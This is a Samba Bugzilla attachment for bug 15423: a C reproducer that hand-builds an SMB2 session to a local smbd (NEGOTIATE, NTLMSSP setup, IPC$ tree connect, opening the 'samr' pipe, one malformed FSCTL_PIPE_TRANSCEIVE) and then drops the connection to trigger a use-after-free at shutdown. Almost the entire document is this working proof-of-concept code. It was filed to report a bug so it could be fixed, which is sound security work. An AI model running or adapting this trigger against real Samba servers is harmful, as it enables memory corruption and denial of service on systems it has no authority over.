The Samba-Bugzilla – Attachment 17988 Details for
Bug 15423
use-after-free in aio_del_req_from_fsp during smbd shutdown after failed IPC FSCTL_PIPE_TRANSCEIVE
client to trigger use-after-free in aio_del_req_from_fsp()
smx49a.c (text/x-csrc), 19.14 KB, created by
Robert Morris
on 2023-07-17 23:39:16 UTC
Description:
client to trigger use-after-free in aio_del_req_from_fsp()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-17 23:39:16 UTC
Size:
19.14 KB
patch
obsolete
/*
 * smx49a.c -- standalone SMB2 client attached to Samba bug 15423 as the
 * reproducer for the use-after-free in aio_del_req_from_fsp() during smbd
 * shutdown.
 *
 * It connects to 127.0.0.1:445 and hand-builds, byte by byte, the request
 * sequence NEGOTIATE -> SESSION_SETUP (two NTLMSSP rounds) -> TREE_CONNECT
 * to IPC$ -> CREATE "samr" -> one FSCTL_PIPE_TRANSCEIVE IOCTL, then closes
 * the socket.  Each builder fills a fixed-size buffer with 0x01, writes the
 * fields it cares about at hand-computed offsets, and sends the whole buffer.
 *
 * Portability notes (for anyone reading this as protocol reference rather
 * than running it):
 *  - multi-byte fields are stored with casts such as *(short*)(buf+ii) into a
 *    char array: host byte order, and unaligned/strict-aliasing accesses that
 *    C does not guarantee to work.  The packets are only well-formed on a
 *    little-endian host.
 *  - responses are read into 1024-byte stack buffers; see readmsg().
 *  - there is no request signing: the Signature field is filled with 'd'.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>

/* Connection state shared by every builder below. */
int s = -1;                 // TCP socket to the server, set in main()
int tree_id = 0;            // TreeId from the TREE_CONNECT response; 0 until then
char session_id[8] = { 0, 0, 0, 0, 0, 0, 0, 0 }; // SessionId from the first SESSION_SETUP response
char file_id[16];           // FileId from the CREATE response (uninitialised before that)

/*
 * Write the 4-byte NetBIOS-over-TCP length prefix and a 64-byte SMB2 SYNC
 * header for `command` into buf, using the global tree_id / session_id.
 *
 * Returns the number of bytes written (always 4 + 64 = 68), which callers
 * use as the offset of the command body.
 *
 * The length prefix written here is a placeholder: buf is a pointer, so
 * sizeof(buf) is the pointer size, not the packet size.  Every caller
 * overwrites buf+2 with htons(len-4) once it knows the final length.
 * MessageId comes from a function-static counter, so it increases by one
 * per request for the lifetime of the process.
 */
int
header(char *buf, int command)
{
  int ii = 0;

  // SMB-over-TCP 4-byte header
  buf[ii++] = 0; // must be zero
  buf[ii++] = 0; // high byte of len
  *(short*)(buf+ii) = htons(sizeof(buf)-4); // non-inclusive len, filled later
  ii += 2;

  // SMB2 SYNC Packet Header, MS-SMB2 2.2.1.2
  buf[ii++] = 0xfe;
  buf[ii++] = 'S';
  buf[ii++] = 'M';
  buf[ii++] = 'B';
  *(short*)(buf+ii) = 64; // StructureSize (of SMB2 header)
  ii += 2;
  *(short*)(buf+ii) = 0; // CreditCharge
  ii += 2;
  *(short*)(buf+ii) = 0; // ChannelSequence
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(short*)(buf+ii) = command;
  ii += 2;
  *(short*)(buf+ii) = 6; // CreditRequest
  ii += 2;
  *(int*)(buf+ii) = 0; // Flags
  ii += 4;
  *(int*)(buf+ii) = 0; // NextCommand
  ii += 4;
  static unsigned long long seq = 0;
  *(long long *)(buf+ii) = seq++; // MessageId
  ii += 8;
  *(int*)(buf+ii) = 0; // Reserved
  ii += 4;
  *(int*)(buf+ii) = tree_id; // TreeId
  ii += 4;
  memcpy(buf+ii, session_id, 8); // SessionId
  ii += 8;
  memset(buf+ii, 'd', 16); // Signature -- filler, requests are not signed
  ii += 16;

  return ii;
}

/*
 * Read exactly n bytes from the global socket s into bufx, looping over
 * short reads.  Returns 0 on success, -1 on EOF or any read error (the
 * partial data already copied is left in bufx).
 */
int
readn(void *bufx, int n)
{
  char *buf = bufx;
  while(n > 0){
    int cc = read(s, buf, n);
    if(cc <= 0)
      return -1;
    n -= cc;
    buf += cc;
  }
  return 0;
}

/*
 * Read one NetBIOS-framed SMB2 message from s into bufx: the 4-byte length
 * prefix, then the number of payload bytes it announces.  Returns the total
 * bytes stored (payload + 4) or -1 if either read fails.
 *
 * NOTE(review): the payload length is taken from the wire (up to 65535) and
 * bufx has no size parameter; every caller in this file passes a 1024-byte
 * stack buffer, so a response larger than 1020 bytes overruns it.  The
 * length is also parsed as 16 bits only; the high byte at buf[1] is ignored.
 */
int
readmsg(void *bufx)
{
  unsigned char *buf = bufx;
  if(readn(buf, 4) < 0)
    return -1;
  int n = (buf[2] << 8) | buf[3];
  if(readn(buf+4, n) < 0)
    return -1;
  return n + 4;
}


/*
 * Send an SMB2 NEGOTIATE offering only dialect 0x0311 with one
 * SMB2_PREAUTH_INTEGRITY_CAPABILITIES context (SHA-512, 2-byte salt), then
 * read the response and print its Status.
 *
 * The whole 160-byte buffer is sent regardless of how much of it was
 * filled; the unused tail is the 0x01 filler from memset.  ii0 is unused.
 */
void
negotiate()
{
  // SMB2 NEGOTIATE, MS-SMB2 2.2.3
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0000);
  int ii0 = ii;

  *(short*)(buf+ii) = 36; // StructureSize, must be 36
  ii += 2;
  *(short*)(buf+ii) = 1; // DialectCount
  ii += 2;
  *(short*)(buf+ii) = 1; // SecurityMode
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(int*)(buf+ii) = 0x3f; // Capabilities
  ii += 4;
  ii += 16; // ClientGuid from MS-DTYP -- left as 0x01 filler
  int context_offset_i = ii;
  *(int*)(buf+ii) = 0; // NegotiateContextOffset
  ii += 4;
  *(short*)(buf+ii) = 1; // NegotiateContextCount
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(short*)(buf+ii) = 0x0311; // Dialect
  ii += 2;

  // Negotiate contexts must start 8-byte aligned relative to the SMB2 header
  // (which begins at buf+4).
  while((ii - 4) % 8)
    ii++;

  *(int*)(buf+context_offset_i) = ii - 4; // NegotiateContextOffset

  {
    *(short*)(buf+ii) = 0x0001; // SMB2_PREAUTH_INTEGRITY_CAPABILITIES
    ii += 2;
    int data_length_i = ii;
    *(short*)(buf+ii) = 0; // DataLength
    ii += 2;
    *(int*)(buf+ii) = 0; // Reserved
    ii += 4;
    int data_field_i = ii;
    *(short*)(buf+ii) = 1; // HashAlgorithmCount
    ii += 2;
    *(short*)(buf+ii) = 2; // SaltLength
    ii += 2;
    *(short*)(buf+ii) = 1; // SHA-512
    ii += 2;
    *(short*)(buf+ii) = 1; // Salt
    ii += 2;
    *(short*)(buf+data_length_i) = ii - data_field_i; // back-patch DataLength
  }

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("negotiate writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for negotiate response\n", cc);
    // buf+4+8: the Status field of the response's SMB2 header
    printf("Status: 0x%x\n", *(int*)(buf+4+8));
  }
}

/*
 * Send an SMB2 SESSION_SETUP carrying a raw NTLMSSP message of the given
 * type (1 = NEGOTIATE, 3 = AUTHENTICATE) and read the response.
 *
 * For type 3 the AUTHENTICATE fields are laid out by hand with fixed
 * offsets (user name 'z' at byte 180, followed by 24 bytes left as filler
 * where an NT response would go).  If the server answers
 * STATUS_MORE_PROCESSING_REQUIRED (0xC0000016) the SessionId from the
 * response header (buf+44) is saved into the global session_id so that the
 * next request continues the same session.  ii0 is unused.
 */
void
setup(int ntlmssp_command)
{
  // SMB2 SESSION_SETUP, MS-SMB2 2.2.5
  char buf[256];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0001);
  int ii0 = ii;

  *(short*)(buf+ii) = 25; // StructureSize
  ii += 2;
  buf[ii++] = 0; // Flags
  buf[ii++] = 3; // SecurityMode
  *(int*)(buf+ii) = 1; // Capabilities -- 1=DFS
  ii += 4;
  *(int*)(buf+ii) = 0; // Channel
  ii += 4;
  *(short*)(buf+ii) = ii + 12 - 4; // SecurityBufferOffset -- 12 = remaining fixed fields
  ii += 2;
  int secbuflen_i = ii;
  *(short*)(buf+ii) = 32; // SecurityBufferLength -- placeholder, back-patched below
  ii += 2;
  memset(buf+ii, 0, 8); // PreviousSessionId
  ii += 8;

  // SecurityBuffer
  int secbufstart_i = ii;
  memcpy(buf+ii, "NTLMSSP", 8); // 8 bytes: includes the terminating NUL
  ii += 8;
  *(int*)(buf+ii) = ntlmssp_command; // ntlmssp_command
  ii += 4;
  if(ntlmssp_command == 1){
    *(int*)(buf+ii) = 0; // flags
    ii += 4;
  }
  if(ntlmssp_command == 3){
    // parse_string = "CdBBAAABdbb";
    // Each field below is a (len, maxlen, offset) triple; offsets are
    // relative to the start of "NTLMSSP".

    // lm_resp
    *(short*)(buf+ii) = 8; // len1
    ii += 2;
    *(short*)(buf+ii) = 8; // len2
    ii += 2;
    *(int*)(buf+ii) = 0; // ptr -- offset from "NTLMSSP"
    ii += 4;
    // ii += 4;

    // nt_resp -- this is the NTLM password
    *(short*)(buf+ii) = 24; // len1
    ii += 2;
    *(short*)(buf+ii) = 24; // len2
    ii += 2;
    *(int*)(buf+ii) = 181 - secbufstart_i; // ptr
    ii += 4;
    // ii += 4;

    // domain
    *(short*)(buf+ii) = 4; // len1
    ii += 2;
    *(short*)(buf+ii) = 4; // len2
    ii += 2;
    *(int*)(buf+ii) = 0; // ptr
    ii += 4;
    // ii += 4;

    // user
    *(short*)(buf+ii) = 1; // len1
    ii += 2;
    *(short*)(buf+ii) = 1; // len2
    ii += 2;
    *(int*)(buf+ii) = 180 - secbufstart_i; // ptr
    ii += 4;
    // ii += 4;

    // netbios_name
    *(short*)(buf+ii) = 4; // len1
    ii += 2;
    *(short*)(buf+ii) = 4; // len2
    ii += 2;
    *(int*)(buf+ii) = 0; // ptr
    ii += 4;
    // ii += 4;

    // encrypted_session_key
    *(short*)(buf+ii) = 8; // len1
    ii += 2;
    *(short*)(buf+ii) = 8; // len2
    ii += 2;
    *(int*)(buf+ii) = 0; // ptr
    ii += 4;
    // ii += 4;

    *(int*)(buf+ii) = 0; // auth_flags
    ii += 4;

    // version_blob
    ii += 8;

    // mic_blob
    ii += 16;

    // now ii = 180
    // user name
    buf[ii++] = 'z';
    // maybe 24 bytes of encrypted NT NTLMv1 password
    ii += 24;
  }

  ii += 16;

  *(short*)(buf+secbuflen_i) = ii - secbufstart_i; // SecurityBufferLength

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("setup writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for setup response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
    // 0xC0000016 means another setup round is required
    if(status == 0xc0000016){
      memcpy(session_id, buf+44, 8); // SessionId field of the response header
    }
  }
}

/*
 * Send an SMB2 TREE_CONNECT to the UTF-16LE path "IPC$" and read the
 * response.  On STATUS_SUCCESS the TreeId from the response header (buf+40)
 * is stored in the global tree_id for use by later headers.  ii0 is unused.
 */
void
tree_connect()
{
  // SMB2 TREE_CONNECT, MS-SMB2 2.2.9
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0003);
  int ii0 = ii;

  *(short*)(buf+ii) = 9; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = 0; // Flags/Reserved
  ii += 2;
  int pathoffset_i = ii;
  *(short*)(buf+ii) = 0; // PathOffset -- back-patched below
  ii += 2;
  unsigned char path[] = { // IPC
    'I', 0,
    'P', 0,
    'C', 0,
    '$', 0,
  };
  *(short*)(buf+ii) = sizeof(path); // PathLength
  ii += 2;

  // PathName
  *(short*)(buf+pathoffset_i) = ii - 4; // offset relative to the SMB2 header
  memcpy(buf+ii, path, sizeof(path));
  ii += sizeof(path);

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("tree_connect writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for tree_connect response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
    if(status == 0){
      tree_id = *(int*)(buf+40); // TreeId field of the response header
    }
  }
}

/*
 * Send an SMB2 CREATE for the UTF-16LE name "samr" on the connected tree
 * (DesiredAccess 3, CreateDisposition open_or_create) with one 4-byte
 * create context, and read the response.  On STATUS_SUCCESS the 16-byte
 * FileId at body offset 64 of the response is saved in the global file_id
 * for the IOCTL/READ/WRITE/LOCK builders.  ii0 is unused.
 */
void
smb_create()
{
  // SMB2 CREATE, MS-SMB2 2.2.13
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0005);
  int ii0 = ii;

  *(short*)(buf+ii) = 57; // StructureSize
  ii += 2;
  buf[ii++] = 0; // SecurityFlags
  buf[ii++] = 0; // RequestedOplockLevel
  *(int*)(buf+ii) = 0; // ImpersonationLevel
  ii += 4;
  memset(buf+ii, 0, 8); // SmbCreateFlags
  ii += 8;
  memset(buf+ii, 0, 8); // Reserved
  ii += 8;
  *(int*)(buf+ii) = 3; // DesiredAccess
  ii += 4;
  *(int*)(buf+ii) = 0; // FileAttributes
  ii += 4;
  *(int*)(buf+ii) = 0; // ShareAccess
  ii += 4;
  *(int*)(buf+ii) = 3; // CreateDisposition; 0=supersede, 3=open_or_create
  ii += 4;
  *(int*)(buf+ii) = 0; // CreateOptions; 1=directory
  ii += 4;
  int nameoffset_i = ii;
  *(short*)(buf+ii) = 0; // NameOffset -- back-patched below
  ii += 2;
  unsigned char path[] = { // samr
    's', 0,
    'a', 0,
    'm', 0,
    'r', 0,
  };
  *(short*)(buf+ii) = sizeof(path); // NameLength
  ii += 2;
  int contextoffset_i = ii;
  *(int*)(buf+ii) = 0; // CreateContextsOffset -- back-patched below
  ii += 4;
  int contextlength_i = ii;
  *(int*)(buf+ii) = 0; // CreateContextsLength -- back-patched below
  ii += 4;

  *(short*)(buf+nameoffset_i) = ii - 4;
  memcpy(buf+ii, path, sizeof(path));
  ii += sizeof(path);

  // Create contexts must be 8-byte aligned relative to the SMB2 header.
  while((ii - 4) % 8)
    ii++;

  // Single SMB2_CREATE_CONTEXT (MS-SMB2 2.2.13.2): 4-byte name tag, 4 bytes
  // of data.
  *(int*)(buf+contextoffset_i) = ii - 4;
  int c0 = ii;
  *(int*)(buf+ii) = 0; // Next
  ii += 4;
  *(short*)(buf+ii) = 16; // NameOffset
  ii += 2;
  *(short*)(buf+ii) = 4; // NameLength
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(short*)(buf+ii) = 24; // DataOffset
  ii += 2;
  *(int*)(buf+ii) = 4; // DataLength
  ii += 4;
  *(int*)(buf+ii) = 0x416c5369; // context name tag, stored as a host-order int
  ii += 4;
  ii += 4; // pad
  *(int*)(buf+ii) = 0; // context data
  ii += 4;

  *(int*)(buf+contextlength_i) = ii - c0;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("create writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for create response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
    if(status == 0){
      // 4 (NBT) + 64 (SMB2 header) + 64 (body offset of FileId)
      memcpy(file_id, buf+4+64+16*4, 16);
    }
  }
}

/*
 * Send an SMB2 READ of 512 bytes at offset 0 on file_id and print the
 * response Status.  Not called from main() in this version.  ii0 is unused.
 */
void
smb_read()
{
  // SMB2 READ, MS-SMB2 2.2.19
  char buf[128];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0008);
  int ii0 = ii;

  *(short*)(buf+ii) = 49; // StructureSize
  ii += 2;
  buf[ii++] = 0; // Padding
  buf[ii++] = 0; // Flags
  *(int*)(buf+ii) = 512; // Length
  ii += 4;
  *(long long *)(buf+ii) = 0; // Offset
  ii += 8;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;
  *(int*)(buf+ii) = 1; // MinimumCount
  ii += 4;
  *(int*)(buf+ii) = 0; // Channel
  ii += 4;
  *(int*)(buf+ii) = 0; // RemainingBytes
  ii += 4;
  *(short *)(buf+ii) = 0; // ReadChannelInfoOffset
  ii += 2;
  *(short *)(buf+ii) = 0; // ReadChannelInfoLength
  ii += 2;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("read writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for read response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 WRITE of 64 bytes (the 0x01 filler) at offset 0 on file_id
 * and print the response Status.  Not called from main() in this version.
 * ii0 is unused.
 */
void
smb_write()
{
  // SMB2 WRITE, MS-SMB2 2.2.21
  char buf[128+64];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x0009);
  int ii0 = ii;

  *(short*)(buf+ii) = 49; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = ii+46-4; // DataOffset -- 46 = remaining fixed fields before the data
  ii += 2;
  *(int*)(buf+ii) = 64; // Length
  ii += 4;
  *(long long *)(buf+ii) = 0; // Offset
  ii += 8;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;
  *(int*)(buf+ii) = 0; // Channel
  ii += 4;
  *(int*)(buf+ii) = 0; // RemainingBytes
  ii += 4;
  *(short *)(buf+ii) = 0; // WriteChannelInfoOffset
  ii += 2;
  *(short *)(buf+ii) = 0; // WriteChannelInfoLength
  ii += 2;
  *(int*)(buf+ii) = 0; // Flags
  ii += 4;

  ii += 64; // data payload: left as filler

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("write writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for write response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 LOCK with a single 1-byte lock element at offset 0 on
 * file_id (Flags 0x11) and print the response Status.  Not called from
 * main() in this version.  ii0 is unused.
 */
void
smb_lock()
{
  // SMB2 LOCK, MS-SMB2 2.2.26
  char buf[128];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x000A);
  int ii0 = ii;

  *(short*)(buf+ii) = 48; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = 1; // LockCount
  ii += 2;
  *(int*)(buf+ii) = 0; // LockSequenceNumber
  ii += 4;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;

  // Locks
  *(long long *)(buf+ii) = 0; // Offset
  ii += 8;
  *(long long *)(buf+ii) = 1; // Length
  ii += 8;
  *(int*)(buf+ii) = 0x11; // Flags
  ii += 4;
  *(int*)(buf+ii) = 0; // Reserved
  ii += 4;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("lock writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for lock response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 IOCTL with CtlCode FSCTL_SRV_COPYCHUNK, an all-0xff FileId
 * and a 32-byte input blob laid out as VALIDATE_NEGOTIATE_INFO, and print
 * the response Status.  Not called from main() in this version.  ii0 is
 * unused.
 *
 * NOTE(review): the comment on CtlCode says COPYCHUNK while the input is a
 * VALIDATE_NEGOTIATE_INFO body; which one was intended is not clear from
 * the code.
 */
void
smb_ioctl_validate()
{
  // SMB2 IOCTL, MS-SMB2 2.2.31
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x000B);
  int ii0 = ii;

  *(short*)(buf+ii) = 57; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(int*)(buf+ii) = 0x00140204; // CtlCode FSCTL_SRV_COPYCHUNK
  ii += 4;
  //memcpy(buf+ii, file_id, sizeof(file_id));
  memset(buf+ii, 0xff, 16); // FileId: all 0xff rather than the opened handle
  ii += 16;
  *(int*)(buf+ii) = ii - 4 + 32; // InputOffset -- 32 = remaining fixed fields
  ii += 4;
  *(int*)(buf+ii) = 32; // InputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxInputResponse
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputOffset
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxOutputResponse
  ii += 4;
  *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl
  ii += 4;
  *(int*)(buf+ii) = 0; // Reserved
  ii += 4;

  // VALIDATE_NEGOTIATE_INFO
  *(int*)(buf+ii) = 0; // Capabilities
  ii += 4;
  ii += 16; // Guid
  *(short*)(buf+ii) = 0; // SecurityMode
  ii += 2;
  *(short*)(buf+ii) = 1; // DialectCount
  ii += 2;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("ioctl writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for ioctl response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 IOCTL with CtlCode FSCTL_GET_COMPRESSION on file_id and
 * print the response Status.  Not called from main() in this version.
 * ii0 is unused.
 *
 * The 32-byte input body is the same VALIDATE_NEGOTIATE_INFO layout as in
 * smb_ioctl_validate(); it appears to have been copied from there.
 */
void
smb_ioctl_get_compression()
{
  // SMB2 IOCTL, MS-SMB2 2.2.31
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x000B);
  int ii0 = ii;

  *(short*)(buf+ii) = 57; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(int*)(buf+ii) = 0x0009003C; // CtlCode FSCTL_GET_COMPRESSION
  ii += 4;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;
  *(int*)(buf+ii) = ii - 4 + 32; // InputOffset
  ii += 4;
  *(int*)(buf+ii) = 32; // InputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxInputResponse
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputOffset
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxOutputResponse
  ii += 4;
  *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl
  ii += 4;
  *(int*)(buf+ii) = 0; // Reserved
  ii += 4;

  // VALIDATE_NEGOTIATE_INFO
  *(int*)(buf+ii) = 0; // Capabilities
  ii += 4;
  ii += 16; // Guid
  *(short*)(buf+ii) = 0; // SecurityMode
  ii += 2;
  *(short*)(buf+ii) = 1; // DialectCount
  ii += 2;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("ioctl writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for ioctl response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 IOCTL with CtlCode FSCTL_PIPE_TRANSCEIVE on file_id (the
 * "samr" pipe opened by smb_create) and print the response Status.
 *
 * InputCount is 32 but no input payload is written explicitly: the 32
 * bytes at InputOffset are the 0x01 filler from memset, i.e. this is not a
 * valid DCERPC PDU.  This is the last request main() sends before closing
 * the socket; the bug report names this IOCTL as the step after which the
 * server-side use-after-free is observed.  ii0 is unused.
 */
void
smb_ioctl_pipe()
{
  // SMB2 IOCTL, MS-SMB2 2.2.31
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x000B);
  int ii0 = ii;

  *(short*)(buf+ii) = 57; // StructureSize
  ii += 2;
  *(short*)(buf+ii) = 0; // Reserved
  ii += 2;
  *(int*)(buf+ii) = 0x0011c017; // CtlCode FSCTL_PIPE_TRANSCEIVE
  ii += 4;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;
  *(int*)(buf+ii) = ii - 4 + 32; // InputOffset
  ii += 4;
  *(int*)(buf+ii) = 32; // InputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxInputResponse
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputOffset
  ii += 4;
  *(int*)(buf+ii) = 0; // OutputCount
  ii += 4;
  *(int*)(buf+ii) = 512; // MaxOutputResponse
  ii += 4;
  *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl
  ii += 4;
  *(int*)(buf+ii) = 0; // Reserved
  ii += 4;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("ioctl writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for ioctl response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Send an SMB2 QUERY_DIRECTORY on file_id with FileInformationClass 0x0C
 * and the UTF-16LE pattern "*2*", and print the response Status.  Not
 * called from main() in this version.  ii0 is unused.
 */
void
query_directory()
{
  // SMB2 QUERY_DIRECTORY, MS-SMB2 2.2.33
  char buf[128+32];
  memset(buf, 1, sizeof(buf));

  int ii = header(buf, 0x000E);
  int ii0 = ii;

  *(short*)(buf+ii) = 33; // StructureSize
  ii += 2;
  buf[ii++] = 0x0C; // FileInformationClass
  buf[ii++] = 0x00; // Flags
  *(int*)(buf+ii) = 0; // FileIndex
  ii += 4;
  memcpy(buf+ii, file_id, sizeof(file_id));
  ii += 16;
  *(short*)(buf+ii) = ii - 4 + 8; // FileNameOffset -- 8 = remaining fixed fields
  ii += 2;
  *(short*)(buf+ii) = 6; // FileNameLength
  ii += 2;
  *(int*)(buf+ii) = 512; // OutputBufferLength
  ii += 4;

  // FileName "*2*" as UTF-16LE
  buf[ii++] = '*';
  buf[ii++] = 0;
  buf[ii++] = '2';
  buf[ii++] = 0;
  buf[ii++] = '*';
  buf[ii++] = 0;

  assert(ii <= sizeof(buf));

  ii = sizeof(buf);

  *(short*)(buf+2) = htons(ii-4); // non-inclusive len

  printf("query_directory writing %d bytes\n", ii); fflush(stdout);

  if(write(s, buf, ii) <= 0){
    perror("write");
    exit(1);
  }

  {
    unsigned char buf[1024];
    memset(buf, 0, sizeof(buf));
    int cc = readmsg(buf);
    printf("read %d for query_directory response\n", cc);
    unsigned int status = *(int*)(buf+4+8);
    printf("Status: 0x%x\n", status);
  }
}

/*
 * Entry point.  Ignores SIGPIPE (so a server-side close surfaces as a write
 * error rather than a signal) and SIGTERM, retries connecting to
 * 127.0.0.1:445 once a second until it succeeds, then runs the request
 * sequence described at the top of the file and closes the socket.
 *
 * Return values of the builders are not checked; each of them exits on a
 * failed write but carries on after a failed or short read.  Falls off the
 * end without an explicit return (0 under C99 and later).
 */
int
main()
{
  signal(SIGPIPE, SIG_IGN);
  signal(SIGTERM, SIG_IGN);

  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(445); // SMB over TCP
  sin.sin_addr.s_addr = inet_addr("127.0.0.1");

  while(1){
    s = socket(AF_INET, SOCK_STREAM, 0);
    if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0)
      break;
    close(s);
    sleep(1);
  }

  sleep(1);

  negotiate();
  setup(1);
  setup(3);
  tree_connect();
  smb_create();
  smb_ioctl_pipe();

  // Close while the pipe handle from smb_create() is still open.
  sleep(1);
  close(s);
}